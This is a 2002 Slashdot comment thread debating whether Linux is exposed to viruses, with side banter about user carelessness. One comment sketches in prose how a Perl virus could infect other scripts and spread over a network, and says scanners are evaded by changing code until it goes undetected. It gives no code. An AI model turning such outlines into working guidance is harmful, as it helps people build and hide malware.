            Well, I don't know about you, but when I download and compile a tarball, I don't actually read through megabytes of source code looking for a self-replicator. I trust the source. I guess almost everyone does the same. And what is the source? Well, I trust RedHat CDs, I trust the Red Hat web site almost as much (assuming no sneaky
            DNS spoofing ...)

            OK, so the RedHat site is OK, but I also go to DaveCentral, and Freshmeat, and SourceForge, and the CGI Resource, and I follow links from there to the web site that the software came from ....

            In other words, I get software from *all over*, and I'd guess that other folks do too.

            And your point is that *you* get to make the decision about who to trust; my point is that Mr Average User gets that *badly* wrong, and I will too, sometimes. It's a balance. I *really want* this program that synchronises my system clocks, and the site I got it from certainly looks OK, I mean, all the words are spelled pretty much right and there's not a single "31334" there.

            And we all know, you can't have a virus on Linux, so I don't actually have to be the least bit careful, right? Wrong.

            "I'm not worried about viruses"

            I agree, you don't have to be worried. But I'd suggest that you be at least a little bit *careful*.

            So, why should you care if Mr Average user hoses his data?

            A) because you're his tech support person, and you're the one he'll complain to
            B) because he's now sending worms to everyone else on the subnet, because that's that this worm does
            C) because some worms choose a random file to mail out, and that can be *really embarrassing*.

            On your final point about virus scanners; you're assuming that a heuristic searches for unlink; I doubt if any heuristics do that. I personally never wrote a heuristic (it wasn't needed when I was in the game), but I know folks who wrote the ones that are in scanners that are in very common use today, and I remember one of them telling me about one of the heuristics in the scanner for Word viruses, and it was looking for something I'd never heard of, that was to do with copying macros. You don't look for the damage routine, you look for the self-copying routine. And there's probably a lot more on heuristics; like I said, I never wrote one, so I don't know.

            It is *trivially easy* to write a virus that today's scanners can't detect. A scanner is looking for a particular bunch of things; all you need to do is keep changing your virus until the scanner doesn't detect it any more.

            And you don't need to be knowledgable to write a virus. A virus is just a program that copies itself. You could write that in perl in not many minutes. Add the code to look for another .pl program, and have the virus edit that to include your virus. You could add calls to copy across the net in a few minutes more. And it's at that point that you can start getting fancy. Please don't assume that virus authors are all really great programmers; more than 99% of them are not. I know because, I used to disassemble their code.

            Today, there isn't a significant virus problem in Linux. I hope it stays that way.
    • by gilroy (155262) on Sunday June 02, 2002 @10:26PM (#3628657) Homepage Journal
      Blockquoth the poster:

      It is, of course, a very insulting question, like asking firemen if they start fires, or dentists if they're the cause of tooth decay.

      True story: My dentist, when I was a kid, would give out lollipops. Pure sugar, artificially-colored, decay-inducing lollipops. Swear to God.
      • Firemen, too. (Score:4, Interesting)

        by Ungrounded Lightning (62228) on Monday June 03, 2002 @12:54AM (#3629185) Journal
        It is, of course, a very insulting question, like asking firemen if they start fires, or dentists if they're the cause of tooth decay.

        True story: My dentist, when I was a kid, would give out lollipops. Pure sugar, artificially-colored, decay-inducing lollipops. Swear to God.

        Also: More than one fire department has been caught setting fires to put out. (It's especially prevalant among volunteer fire departments, which are often composed of people who enjoy playing with fires.)
  • by SmegTheLight (521218) on Sunday June 02, 2002 @08:44PM (#3628335)
    ..we would have some way to spread the virus on linux :)
  • by Lumpy (12016) on Sunday June 02, 2002 @10:17PM (#3628625) Homepage
    Like patch outlook,IE and IIS? change all the settings on outlook and grey out the checkboxes with the registry settings so the moron users won't set it back to use word as your mail reader...(and can we please disable that damned out of office assistant?)

    99.997% of all virii spread because the virus writers know that the end users are dumb as a box of rocks... hell, how many times have we had email spread viruses, and people STILL open attachments without a thought.. (Wow dave's sending me nude pictures of his wife again!)

    the only way to stop virus attacks are to either kill all the users (I wish!) or disable the dangerous options in the software they are using.

    only then will we stop the virus problems.

What is worth doing is worth the trouble of asking somebody to do.